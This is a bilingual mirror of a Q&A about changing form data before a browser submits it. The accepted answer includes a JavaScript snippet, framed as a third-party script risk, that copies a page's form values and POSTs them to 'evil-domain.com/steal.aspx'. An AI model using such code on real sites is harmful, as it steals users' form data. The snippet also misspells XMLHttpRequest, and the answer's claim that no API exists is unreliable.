有没有办法在提交之前修改将发送到服务器的表单数据?
[英]Is there a way to modify the form data that will be sent to the server before submitting it?
问题描述
Short of adding more hidden controls to the form in the submit event, is there a way to change the payload that will be sent when a form is submitted, before the form is submitted?
除了在submit事件中submit表单添加更多隐藏控件之外,有没有办法在提交表单之前更改提交表单时将发送的有效负载?
$("#frm").submit(event) {
// Is there an API to change
// the request body here
}
For eg I'd like to --例如,我想——
Change the name of a hidden field that's being sent.
更改正在发送的隐藏字段的名称。Add a few iterable / enumerable objects to the request body / payload.
将一些可迭代/可枚举的对象添加到请求正文/有效负载中。
I can work around both the issues, by adding more hidden controls with the names I want, to the form, and write a custom model binder on the server.我可以解决这两个问题,方法是在表单中添加更多带有我想要的名称的隐藏控件,并在服务器上编写自定义模型绑定器。
But is there a client-side API that allows you to modify the contents that will be sent to the server before sending them?但是是否有客户端 API 允许您在发送之前修改将发送到服务器的内容?
2 个解决方案
解决方案1
1 2019-01-05 08:14:54
I advice you to look at Is it possible to change form data before sending it?我建议您在发送之前查看是否可以更改表单数据?
That question may has a partial solution for your problem as far as I understand据我了解,该问题可能对您的问题有部分解决方案
解决方案2
0 已采纳 2019-07-30 11:39:55
As of this time, no there isn't.截至目前,没有没有。 And there probably never will be because of the security implications of this.由于安全隐患,可能永远不会有。
Security Implications of Having Such a Feature具有此类功能的安全影响
Imagine a third-party script you downloaded because you were using a plug-in (for eg Google Analytics, ShareThis, ads from an ad provider, etc.) being able to inject their own data into your forms.想象一下您因为使用插件(例如 Google Analytics、ShareThis、来自广告提供商的广告等)而下载的第三方脚本,该脚本能够将他们自己的数据注入您的表单。 It would be possible for them to do this if there was such a way.如果有这样的方式,他们就有可能做到这一点。
But you can do something like that for AJAX requests但是你可以对 AJAX 请求做类似的事情
There is indeed a FormData object but that's just a property bag that allows a script to copy data from an existing form element on the page or to simply start with a blank FormData object, ie a blank property bag, put some additional properties in it, and send those off to a server, whether your web application or a third-party one, but only in an AJAX request .确实是有FormData对象,但是这只是一个属性包,允许一个脚本将数据从现有副本form元素的页面上,或者简单地用空白开始FormData对象,即一个空白的属性包,把一些附加的属性在里面,并将它们发送到服务器,无论是您的 Web 应用程序还是第三方应用程序,但仅限于 AJAX 请求。
var additionalDataToAppendToForm = { ... };
var formData = new FormData(myFormElement); // copies existing values from form to FormData
formData.delete(existingFieldName1);
formData.set(existingFieldName2, "newValue");
formData.append(/*name */ "additionalField1", /* value */ additionalDataToAppendToForm);
var xhr = new XmlHttpRequest();
xhr.open("POST", "https://evil-domain.com/steal.aspx");
xhr.send(formData);
And that's a security implication for your web application if and only if you have not paid attention to the Same Origin Policy and not protected your web server from pre-flight requests from other domains.当且仅当您没有注意同源策略并且没有保护您的 Web 服务器免受来自其他域的预检请求时,这才是您的 Web 应用程序的安全隐患。
PS: I had asked this question and had back then decided that there wasn't a way and that was correct, and had added more hidden fields to my form, as indicated in my question. PS:我曾问过这个问题,当时我认为没有办法而且那是正确的,并且在我的表单中添加了更多隐藏字段,如我的问题所示。 But since then, I was meaning to write an answer to clarify for anyone else who may have this question, so I am writing this answer.但从那以后,我想写一个答案来澄清其他可能有这个问题的人,所以我写了这个答案。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.